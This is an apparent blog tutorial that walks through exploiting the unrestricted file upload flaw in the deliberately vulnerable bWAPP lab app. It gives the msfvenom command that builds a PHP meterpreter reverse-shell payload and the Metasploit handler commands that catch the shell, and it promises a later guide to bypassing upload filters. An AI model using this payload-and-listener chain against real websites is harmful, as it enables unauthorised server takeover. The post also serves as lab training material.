In this post I’ll be teaching you all how to hack a website by uploading a php file and get a reverse shell from it using Metasploit !
I’ll be performing this attack on Kali Linux against an intentionally vulnerable application bWAPP(buggy web application) !
For downloading and setting up bWAPP on your Kali Machine, check out the article below for the entire procedure :-
https://www.kalilinux.in/2020/02/bwapp-in-kali-linux-2020.html
Once you are done with the complete setup , we are set to HACK IT !!!
We are going to create a php file with the help of meterpreter, upload it on the site…and then get a reverse shell using metasploit
Lets Begin
Open up your Kali terminal and enter the below commands if you have uploaded your bWAPP on the apache server :-
sudo service apache2 start sudo service mysql start
Then head on to your browser and locate to ” localhost/bWAPP/login.php “
Then select unrestricted file upload and hit the HACK button as shown above !
You will get a browse and upload button as shown above.
Now we need to create a payload using msfvenom to upload here (which is a php file in this case)
Enter the following command to create the desired php file payload :-
sudo msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.108 lport=4444 -f raw > /home/danin/Desktop/daninhack.php
Here, -p is for setting up the payload lhost is the attacker's ip address (your ip address) lport is the port you want to listen on -f is for the output
Since our payload has been created, head to the website and hit the browse button, and upload the php file just created (in my case it’s daninhack.php) as shown below :
Now hit the upload button and the file will be uploaded !
Then we need to setup the listener on Metasploit
Enter the following commands :-
use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 192.168.0.108 exploit
Now the Final step!!!
Head back to the website where you uploaded the php file and click on the button highlighted below :
Now when you look at your terminal , you have got a METERPRETER SHELL !!!
BOOOOM !!! ⚡⚡⚡You hacked it !
Now you can do anything you want to with the meterpreter shell , type for all the available options and have fun !!
That’s why it is important that the websites doesn’t allow a user to upload a file with any extension, it should be limited as per the requirement!
But daNiN is there for you 😉 who will also teach you to bypass these restrictions where you cant’t upload files with other extensions (since some websites allow only .jpg and .pdf files to be uploaded)
STAY TUNED !!!
If u face any kind of issue or need some help in it’s additional features,feel free to leave a comment or directly connect with me on my Instagram handle, my mail or my WhatsApp group…..details of which are mentioned on my home page 🤗
daNiN hacking Tutorials